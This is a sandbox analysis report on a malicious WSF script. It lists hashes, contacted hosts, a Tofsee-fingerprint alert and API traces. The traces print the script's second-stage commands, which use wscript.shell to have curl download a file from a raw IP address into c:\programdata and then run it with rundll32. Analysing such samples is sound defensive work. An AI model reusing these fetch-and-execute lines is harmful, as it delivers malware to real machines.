Summary | ZeroBOX

Funds_792120.wsf

Category:  FILE
Machine:   s1_win7_x6401
Started:   April 19, 2023, 9:33 a.m.
Completed: April 19, 2023, 9:35 a.m.
Size:      77.8KB
Type:      UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
MD5:       dbf85f39dd98463b298f50302d64ea40
SHA256:    13bde59e20034a2ce1797c7890cdd770fedef78f29f0e47c558c6eb9d91e8f10
CRC32:     2758F827
ssdeep:    1536:uA8ZOy2JyfnK/32SNnW7s8LnNVcKOAuWQwnn5QJp985ElDCCjIWp:uQNJWnK/mSN58LnNVcg75Q186lDCji
Yara:      None matched

Name            Response         Post-Analysis Lookup
pastebin.com    104.20.67.143

IP Address         Status    Action
164.124.101.2      Active    Moloch
172.67.34.170      Active    Moloch
216.120.201.169    Active    Moloch

Suricata Alerts

Flow:      TCP 192.168.56.101:49161 -> 172.67.34.170:443
SID:       906200054
Signature: SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)
Category:  undefined

Suricata TLS

Flow:        TLSv1 192.168.56.101:49161 -> 172.67.34.170:443
Issuer:      C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2
Subject:     C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Fingerprint: 79:b7:9c:ec:8a:be:ea:82:0d:16:04:fb:46:5f:89:6b:78:b9:43:fd

request GET https://pastebin.com/raw/zD5ag0UX
request GET https://pastebin.com/raw/mJfkXNYx
host 216.120.201.169
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: https://pastebin.com/raw/zD5ag0UX
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/zD5ag0UX
1 13369356 0

InternetCrackUrlA

url: https://pastebin.com/raw/zD5ag0UX
flags: 0
1 1 0

InternetReadFile

buffer: new ActiveXObject('wscript.shell').run('curl.exe --output c:\\programdata\\index.html --url ' + url, 6);
request_handle: 0x00cc000c
1 1 0

InternetCrackUrlW

url: https://pastebin.com/raw/mJfkXNYx
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/mJfkXNYx
1 13369356 0

InternetCrackUrlA

url: https://pastebin.com/raw/mJfkXNYx
flags: 0
1 1 0

InternetReadFile

buffer: new ActiveXObject('wscript.shell').run('rundll32 c:\\programdata\\index.html,Motd');
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: https://pastebin.com/raw/zD5ag0UX
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/zD5ag0UX
1 13369356 0

send

buffer: !
socket: 860
sent: 1
1 1 0

send

socket: 968
sent: 116
1 116 0

send

buffer: !
socket: 860
sent: 1
1 1 0

send

socket: 968
sent: 134
1 134 0

send

buffer: !
socket: 860
sent: 1
1 1 0

send

socket: 968
sent: 341
1 341 0

send

buffer: !
socket: 860
sent: 1
1 1 0

InternetCrackUrlA

url: https://pastebin.com/raw/zD5ag0UX
flags: 0
1 1 0

InternetCrackUrlW

url: https://pastebin.com/raw/mJfkXNYx
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/mJfkXNYx
1 13369356 0

send

socket: 968
sent: 341
1 341 0

send

buffer: !
socket: 860
sent: 1
1 1 0

InternetCrackUrlA

url: https://pastebin.com/raw/mJfkXNYx
flags: 0
1 1 0
parent_process wscript.exe martian_process rundll32 c:\programdata\index.html,Motd
parent_process wscript.exe martian_process curl.exe --output c:\programdata\index.html --url http://216.120.201.169/aSxBaqnfj98wz.dat
parent_process wscript.exe martian_process "C:\util\curl\curl.exe" --output c:\programdata\index.html --url http://216.120.201.169/aSxBaqnfj98wz.dat
parent_process wscript.exe martian_process "C:\Windows\System32\rundll32.exe" c:\programdata\index.html,Motd
dead_host 216.120.201.169:80
count    name       process       total_mb   length    protection
5483     heapspray  wscript.exe   235        45056     PAGE_READWRITE
46613    heapspray  wscript.exe   546        12288     PAGE_READWRITE
8222     heapspray  wscript.exe   289        36864     PAGE_READWRITE
2741     heapspray  wscript.exe   160        61440     PAGE_READWRITE
5483     heapspray  wscript.exe   342        65536     PAGE_READWRITE
13706    heapspray  wscript.exe   374        28672     PAGE_READWRITE
8248     heapspray  wscript.exe   64         8192      PAGE_READWRITE
5485     heapspray  wscript.exe   278        53248     PAGE_READWRITE
5484     heapspray  wscript.exe   407        77824     PAGE_READWRITE
2740     heapspray  wscript.exe   267        102400    PAGE_READWRITE
5485     heapspray  wscript.exe   428        81920     PAGE_READWRITE
8235     heapspray  wscript.exe   160        20480     PAGE_READWRITE
5488     heapspray  wscript.exe   128        24576     PAGE_READWRITE
8223     heapspray  wscript.exe   546        69632     PAGE_READWRITE
2741     heapspray  wscript.exe   128        49152     PAGE_READWRITE
file C:\util\curl\curl.exe
file C:\Windows\System32\rundll32.exe